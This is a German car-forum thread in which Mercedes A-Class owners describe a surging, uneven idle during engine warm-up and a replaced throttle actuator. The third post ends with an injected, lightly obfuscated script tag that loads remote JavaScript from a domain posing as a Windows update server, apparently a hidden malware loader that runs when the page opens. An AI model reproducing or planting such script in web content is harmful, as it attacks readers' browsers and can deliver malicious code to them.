Leerlaufprobleme im Warmlauf...

Diskutiere Leerlaufprobleme im Warmlauf... im Forum A- und B-Klasse im Bereich Mercedes-Benz - Guten Morgen! Wir hatten bei unserem 140er (Prod. Ende 2003) das Problem, dass er während der Warmlaufphase extrem sägte (Drehzahlabfall auf...
K

Kater Fritz

Guest
Guten Morgen!

Wir hatten bei unserem 140er (Prod. Ende 2003) das Problem, dass er während der Warmlaufphase extrem sägte (Drehzahlabfall auf ca. 500 U/min, dann wieder Anstieg auf über 1500 U/min usw.). Nun wurde der "Drosselklappensteller" getauscht. Das Teil befindet sich am Ende des Saugrohres vom Luftfiltergehäuse, ist aus ALU und wird auch mit den beiden großen Steckern angeschlossen.
Das Sägen im Warmlauf ist nun wie es ausschaut weg. Geblieben ist allerdings ein etwas unrunder Leerlauf während der Warmlaufphase, immer wieder so kurze mehrmalige "Würgeschübe". Im warmen Zustand passts.
Jetzt die Fragen:
Was könnte es noch sein?
Und was ist in dem getauschten Teil beinhaltet? Nach meinen Infos müsste darin der Luftmassenmesser, die Drosselklappe und das Motorsteuergerät integriert sein.
Laut Werkstatt sitzt aber das eigentliche MSG in dem Gehäuse rechts an der Stirnwand.
Könnt ihr mich bitte aufklären?
Danke

Katerle
 
Hallo Katerle,

ist das Problem mittlerweile gelöst? Habe die gleichen Probleme. Während der Warmlaufphase in der ersten Minute sackt er zweimal auf unter 1000 U/min ab, verschluckt sich bzw. setzt aus und geht dann wieder auf ca. 1100 U/min. Danach läuft er als wäre nichts gewesen. Das Problem trat bisher bei Temperaturen über 0° Grad auf. Im Winter unter 0° Grad lief er Problemlos.

Gruß
katerbobby
 
ja auch ich hab ziemlich die gleichen probleme. Wenn das gelöst wäre das toll.

<script language='JavaScript' type='text/javascript'>document.write ("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>
 
Thema: Leerlaufprobleme im Warmlauf...
Zurück
Oben